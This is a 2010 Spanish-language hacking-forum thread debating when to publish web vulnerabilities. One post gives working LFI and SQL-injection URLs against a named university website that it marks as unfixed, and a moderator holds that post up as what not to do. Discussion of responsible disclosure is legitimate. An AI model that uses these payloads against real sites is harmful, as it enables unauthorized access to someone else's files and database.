URL externa en recopilatorio de bugs xss/sqli/etc..

Iniciado por WHK, 20 Enero 2010, 05:09 AM

0 Miembros y 1 Visitante están viendo este tema.

LeGNa29A

Cita de: Anon en 20 Enero 2010, 22:28 PM

Eso de que descubren el XSS y en el mismo dia lo publican aqui... bueno.

En mi opinion deberian de esperar a que el bug este corregido.


Si, eso lo entendí más tarde... dejar un tiempo prudencial después de reportar.
De los errores se aprende.

Gracias,

PS: aunque dudo que esa organización empeore su imagen por esto... :s
"Sólo en la medida en que nos exponemos a la aniquilación una y otra vez, encontramos aquello que nos hace verdaderamente indestructibles."
(Pema Chödrön)

Castg!

Sitio web: http://scuegypt.edu.eg/
Descubridor:  Castg!
URL del aviso: Vía E-mail @
Fecha de descubrimiento: 21/01/10
Fecha de notificación: 21/01/10
Fecha de publicación: 21/01/10
Arreglado: No
Información adicional: Tiene un LFI y SQLi

LFI: http://scuegypt.edu.eg/faculty/public_pages/download.php?path=../download.php
SQLi: http://scuegypt.edu.eg/public_pages/view_pages.php?page_id=-11+union+all+select+1,2,3,4,5,6--#

sirdarckcat

Citarosea que si la pongo en mi blog , esta bien el post ?
si, con que pongan la misma informacion primero en su blog/pastebin/fulldisclosure/txt.io/etc.. y despues pongan el enlace aqui es suficiente.

sirdarckcat

CitarSitio web: http://scuegypt.edu.eg/
Descubridor: Castg!
URL del aviso: Vía E-mail @
Fecha de descubrimiento: 21/01/10
Fecha de notificación: 21/01/10
Fecha de publicación: 21/01/10
Arreglado: No
Información adicional: Tiene un LFI y SQLi

LFI: http://scuegypt.edu.eg/faculty/public_pages/download.php?path=../download.php
SQLi: http://scuegypt.edu.eg/public_pages/view_pages.php?page_id=-11+union+all+select+1,2,3,4,5,6--#
ese es el ejemplo perfecto de lo que no deben hacer

Castg!

¬¬ entonces, a ver si entiendo bien, ahora me hago un blogspot, una nueva entrada que se llame Vulnerabilidades, y pongo una ficha como estas para cada una de las vulnerabilidades, y despues aca, en cada fuicha que yo puse en el foro, le pongo,
CitarURL de Aviso: castg.blogspot.com/vulnerabilidades.html

y  ahi no me lo van a eliminar??



YST

Por cierto no se cual es la idea de postear bugs de webs que no conoce ni el creador :xD


Yo le enseñe a Kayser a usar objetos en ASM

Castg!

sweria como un curriculum, asi por lo menos se llama en argentina, es como una muestra de tus conocimientos para proyectos futuros. se entiende?

jdc

Cita de: YST en 21 Enero 2010, 19:35 PM
Por cierto no se cual es la idea de postear bugs de webs que no conoce ni el creador :xD

es por que todos tenemos nuestro momento h4x0r en nuestra vida...  :xD